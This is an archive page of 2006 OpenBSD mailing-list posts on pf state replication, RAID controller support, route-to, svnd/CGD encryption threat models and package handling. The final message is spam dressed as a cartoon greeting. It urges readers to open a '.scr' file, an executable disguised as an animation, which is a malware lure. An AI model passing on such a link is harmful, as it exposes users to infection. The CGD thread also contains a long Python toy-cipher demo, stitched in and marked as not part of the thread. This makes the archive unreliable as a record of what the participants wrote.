j knight [EMAIL PROTECTED] wrote:

 When you compare pfctl -ss on either firewall, do you see state
 information being replicated?

Yep, I can confirm the states are being copied just fine. I hope someone
is still watching this thread!

-- 
Regards, Ed http://www.usenix.org.uk - http://irc.is-cool.net 
:%s/Open Source/Free Software/g



PERC 4e/si support in ami?

2006-01-04 Thread Jörg Streckfuß
hi list,

I'm searching for a 1U server-platform-solution for
a redundant firewall-system based on openbsd.
The firewall-system should support raid 1 and at least
8 NICs.
My first choice is a Dell 1850 with embedded PERC 4e/Si
controller. I believe the e means embedded.
Does openbsd support the PERC 4e/Si by ami (the manpage
only lists PERC 4/Si without e)?
The raid-controller has to be embedded because I need the
two pci slots for quad ethernet cards.
And this is my second question. Which quad ethernet card is
to be recommended? I know, this question was discussed many times.
But I don't want to get into trouble with the interrupt-handling
under heavy load with intel cards and the em driver.
In addition I don't need 1 Gbps ethernet cards - 100 Mbit is sufficient.
The D-Link DFE-570TX seems to be the right one for this purpose
but that implies putting an old pci card (32 bit, spec pci2.2) into a
pci-x slot. Is this really a good idea?

Any recommendations would be appreciated.


joerg



Re: PERC 4e/si support in ami?

2006-01-04 Thread Marco Peereboom
Works like a champ.  I'll adjust the man.

On Thu, Jan 05, 2006 at 12:41:30AM +0100, Jörg Streckfuß wrote:
 hi list,
 
 I'm searching for a 1U server-platform-solution for
 a redundant firewall-system based on openbsd.
 The firewall-system should support raid 1 and at least
 8 NICs.
 My first choice is a Dell 1850 with embedded PERC 4e/Si
 controller. I believe the e means embedded.
 Does openbsd support the PERC 4e/Si by ami (the manpage
 only lists PERC 4/Si without e)?
 The raid-controller has to be embedded because I need the
 two pci slots for quad ethernet cards.
 And this is my second question. Which quad ethernet card is
 to be recommended? I know, this question was discussed many times.
 But I don't want to get into trouble with the interrupt-handling
 under heavy load with intel cards and the em driver.
 In addition I don't need 1 Gbps ethernet cards - 100 Mbit is sufficient.
 The D-Link DFE-570TX seems to be the right one for this purpose
 but that implies putting an old pci card (32 bit, spec pci2.2) into a
 pci-x slot. Is this really a good idea?
 
 Any recommendations would be appreciated.
 
 
 joerg



Re: problem with packet filter

2006-01-04 Thread Stuart Henderson
On 2006/01/04 17:00, Mario Beltran wrote:
 Does adding a route to $proxy pointing to $gateway help..?

 Thank you Stuart  for you response :)
 Do you mean that I have to add an static route manually?

Yes (I usually add static routes in /etc/hostname.hme0, etc.)

 I dont want this way, I want that packet filter can do this

 I mean that route-to and reply-to commads were create for this
 situations... or I am wrong?

You are right, that is what route-to/reply-to are for, but when
there is no routing table entry, the packet will be rejected
(destination-unreachable) before it even reaches PF.

Once PF has control of the packet, route-to/reply-to will be used
in preference to the static route.  You could point the static route
to a non-existent address if one is available (it needs to be on a
directly-connected subnet, otherwise attempting to add the route
will give an error).

Once this is done, you might need to adjust the rules.  I don't think
you need tagging (unless I misunderstood what you're trying to do).
pfctl -sr -v is useful to let you check which rules are triggered.



Re: CGD

2006-01-04 Thread Andreas Gunnarsson
On Wed, Jan 04, 2006 at 11:11:01PM +0100, knitti wrote:
 my threat model includes the following two cases. for both of them svnd
 can't protect me really well
 
 case 1)  lets say someone can predict some blocks in my encrypted data,
 then she can find every block (64bit) everywhere within the container
 with the same data.

Of course not, that would have been true if it used ecb.  It uses cbc
which encrypts each disk block with an iv that depends on the block
number, so a plaintext block will be encrypted differently depending
both on which disk block it is in and what data precedes it in that
block.

 # vnconfig -ckv svnd1 /tmp/img1
[...]
 # dd if=/usr/share/misc/license.template of=/dev/rsvnd0c bs=1k count=1
[...]
 # cmp /tmp/img0 /tmp/img1

You are comparing the entire images.  Try instead to fill one image with
a repeating 8-byte pattern and then check the contents.  The encrypted
contents will not be repeated.

 user key==encryption key==Bad Thing(TM)

How would it help to generate a random key which is then encrypted with
a user key and stored on the disk?  A dictionary attack is still quite
possible.

While I'm here I'd like to ramble for a while about the fact that people
seem to be obsessed with the ability to change their passphrases; I've
seen it at least twice in this thread and sometimes I even hear people
talking about changing the passphrase on pgp keys and similar.  That
only helps if you are sure no one has seen your previously encrypted key
but now has been able to guess your passphrase and may in the future be
able to access your encrypted key.  See, if they already have a copy of
the key encrypted with the old passphrase they will still be able to use
your old passphrase on it.  By reencrypting it with a new passphrase you
only give them another chance to crack it.  So changing the passphrase
which is used to encrypt a key is stupid, you really need to generate a
new key.  So it will take a long time to reencrypt the disk, tough luck.

The problem with user remembered passwords is that they aren't strong.
The only way around that is to store a random number somewhere, e.g. a
USB stick or a floppy.

Therefore, you may want a combination of a stored random secret and some
passphrase.  You lose either = you lose your data.  If someone finds
the stored secret they can mount a dictionary attack or start extracting
your finger nails.

If you store the random secret on the disk itself it's a salt.  While
you can use a dictionary on it, it does mean that you have to do that
for each disk you want to crack.  So, salt + passphrase is good, and if
you can store the salt wherever you want it's as good as you can do.

 case 2) data integrity. I don't want, that a person can mess with my
 data without knowing my key. the location of some data can be determined
 on my disk, this data can be replicated everywhere else on the disk.
[...]
 classical replay attack. I seem to have screwed some block boundary,

No.  I don't know why you assume that ecb is used, the reason your
output is messed up is cbc.  It is possible to cut and paste encrypted
data to some extent, but when you do that you will always mess up one
crypto block.  No way around that unless you find the key, so while this
can be a problem it is a little less severe than you say.

This is a problem with cbc, to avoid it you need to use another block
chaining mode or add some integrity check.  CGD also uses cbc according
to http://www.imrryr.org/~elric/cgd/html4/cgd.html so unless there is
some additional integrity check (which is a problem for block devices
since it requires additional storage) it has the same problem.

   Andreas



web server project

2006-01-04 Thread veins

Hi misc@ users,

I have been working for a while on an ISC/OpenBSD licenced web server that will be
used as an httpd replacement for our not-for-profit organization. Code is at a very
early stage, but is being worked on actively and has been powering our own boxes
for weeks now (for static pages only). We are looking for people interested in
joining the project, whether for testing or contributing code, html, design or simply
ideas.

If you are interested, feel free to mail me and ask any question you might have. Oh,
and just to prevent trolls, goals are different from thttpd, lighttpd and definitely very
very far from apache's, and so are the design and features planned.

I'm not advertising the irc channel here, but here's a link to our cvsweb so you can
take a look, keep in mind that it's at a _very early_ stage so lots of code is being
worked on and isn't definitive:

   http://lab.skreel.org/cgi-bin/cvsweb/eoz/

Sorry for those that are not interested, I won't spam anymore ;-)

++ veins



Deletion of indirectly -installed packages (dependencies)

2006-01-04 Thread Andrés Delfino
Hi, I want to know if there are any plans to support the deletion of
indirectly installed packages (dependencies). What I'm trying to say
is, for example, when one adds package FOO, and that package
has tons of dependencies, and one then deletes it, we don't uninstall
all the dependencies.

I know it isn't simple, one must first have a way to say: hey, I'm a
package who was added by a user, I wasn't added just to serve a
package you deleted!!, and then check if the dependency is used by
any package. Also, it should always ask if we want to delete that
dependency, maybe someone starts using it directly instead of using the
package which needed it to be added. But, IMHO, it would be nice, =).

Hope you understand me, good luck



Re: CGD

2006-01-04 Thread veins

Andreas Gunnarsson wrote:

 On Wed, Jan 04, 2006 at 11:11:01PM +0100, knitti wrote:

  my threat model includes the following two cases. For both of them svnd
  can't protect me really well

  case 1)  let's say someone can predict some blocks in my encrypted data,
  then she can find every block (64bit) everywhere within the container
  with the same data.

 Of course not, that would have been true if it used ecb.  It uses cbc
 which encrypts each disk block with an iv that depends on the block
 number, so a plaintext block will be encrypted differently depending
 both on which disk block it is in and what data precedes it in that
 block.

Yeah, and had it been using ECB, still two plaintexts would have to be
aligned to the beginning of a block and fill the 64 bits for the ciphered
block to look the same.
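The CBC-versus-ECB behaviour Andreas describes above, together with the "cut and paste messes up exactly one crypto block" effect he mentions earlier in the thread, as an added example that is not part of the thread or of svnd/CGD: a toy 64-bit Feistel cipher (a stand-in for Blowfish with no security value of its own) run in per-sector CBC with an IV derived from the sector number. The 32-byte sector, the key, the IV derivation and the sample data are all constructed for the demonstration.

```python
import hashlib

BLOCK, SECTOR = 8, 32   # 64-bit blocks as with Blowfish; toy 4-block sector (constructed)

def _f(key, half, rnd):
    # Feistel round function: keyed hash of one 32-bit half (toy cipher, no security claim)
    return int.from_bytes(hashlib.sha256(key + bytes([rnd]) + half.to_bytes(4, "big")).digest()[:4], "big")

def encrypt_block(key, block):
    l, r = int.from_bytes(block[:4], "big"), int.from_bytes(block[4:], "big")
    for i in range(4):
        l, r = r, l ^ _f(key, r, i)
    return l.to_bytes(4, "big") + r.to_bytes(4, "big")

def decrypt_block(key, block):
    l, r = int.from_bytes(block[:4], "big"), int.from_bytes(block[4:], "big")
    for i in reversed(range(4)):        # undo the rounds in reverse order
        l, r = r ^ _f(key, l, i), l
    return l.to_bytes(4, "big") + r.to_bytes(4, "big")

def sector_iv(key, sector_no):
    # IV tied to the sector number, as the thread describes for svnd (derivation constructed)
    return hashlib.sha256(key + b"iv" + sector_no.to_bytes(8, "big")).digest()[:BLOCK]

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_encrypt_sector(key, sector_no, pt):
    out, prev = [], sector_iv(key, sector_no)
    for i in range(0, SECTOR, BLOCK):
        prev = encrypt_block(key, _xor(pt[i:i + BLOCK], prev)); out.append(prev)
    return b"".join(out)

def cbc_decrypt_sector(key, sector_no, ct):
    out, prev = [], sector_iv(key, sector_no)
    for i in range(0, SECTOR, BLOCK):
        out.append(_xor(decrypt_block(key, ct[i:i + BLOCK]), prev)); prev = ct[i:i + BLOCK]
    return b"".join(out)

def ecb_encrypt_sector(key, pt):        # no chaining: equal plaintext blocks repeat in ciphertext
    return b"".join(encrypt_block(key, pt[i:i + BLOCK]) for i in range(0, SECTOR, BLOCK))

def repeated_blocks(ct):                # ciphertext blocks that duplicate an earlier one
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return len(blocks) - len(set(blocks))

def relocated_garbled_blocks(key, pt, src, dst):
    # copy sector src's ciphertext over sector dst: only the first block fails to decrypt
    back = cbc_decrypt_sector(key, dst, cbc_encrypt_sector(key, src, pt))
    return sum(back[i:i + BLOCK] != pt[i:i + BLOCK] for i in range(0, SECTOR, BLOCK))

KEY, PT = b"constructed-demo-key", b"SAMEDATA" * 4   # four identical plaintext blocks
```

Because the blocks after the first chain off the previous ciphertext rather than the IV, the relocated sector decrypts cleanly apart from its first block, which is why the thread concludes that only an integrity check (with its extra storage) can catch this on a block device.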



Re: What does this error message mean?

2006-01-04 Thread Jim Mays

I found a very strange line in my /etc/hosts file.  The line says

::1 localhost.cimsolve.com localhost

This line is followed by a normal line

127.0.0.1 localhost.cimsolve.com localhost

How did the first line get there, because I didn't put it there.

Jim



Re: What does this error message mean?

2006-01-04 Thread jared r r spiegel
On Wed, Jan 04, 2006 at 08:44:19PM -0600, Jim Mays wrote:
 I found a very strange line in my /etc/hosts file.  The line says
 
 ::1 localhost.cimsolve.com localhost
 
 This line is followed by a normal line
 
 127.0.0.1 localhost.cimsolve.com localhost
 
 How did the first line get there, because I didn't put it there.

  does it look like it is from:

/usr/src/distrib/miniroot/install.sh:

   330 # Always create new hosts file.
   331 cat > /tmp/hosts << __EOT
   332 ::1 localhost
   333 127.0.0.1 localhost
   334 ::1 $(hostname -s)
   335 127.0.0.1 $(hostname -s)
   336 __EOT

-- 

  jared

[ openbsd 3.8 GENERIC ( dec 16 ) // i386 ]



Re: What does this error message mean?

2006-01-04 Thread jared r r spiegel
On Mon, Jan 02, 2006 at 08:17:43PM -0600, Jim Mays wrote:
 
 resolv.conf file:
 
 search hsd1.tx.comcast.net.
 nameserver 68.87.85.98
 nameserver 68.87.69.146
 looklup file bind

  if that is a paste-o and not a type-o, that might be attributable to 
  a little bit of suckage. ( looklup != lookup )

-- 

  jared

[ openbsd 3.8 GENERIC ( dec 16 ) // i386 ]



You received a Humortadela cartoon

2006-01-04 Thread charges
Hello!

Someone who had nothing better to do, on one of their visits to Humor
Tadela, for who knows what reason, recommended the following page to you:

Animated Joke: Happily Ever After?

Didn't work?

Don't despair! Open your browser and type in the following address:

http://humortadela.com.br/charges.scr

Or go there by CLICKING HERE!!!

Still didn't work?

Well, then it's time to start despairing...

The Humor Tadela crew
The biggest humor site in Latin America!
http://humortadela.com.br

On 03/01/2005, Brasília time, yellow, 75 and in good condition.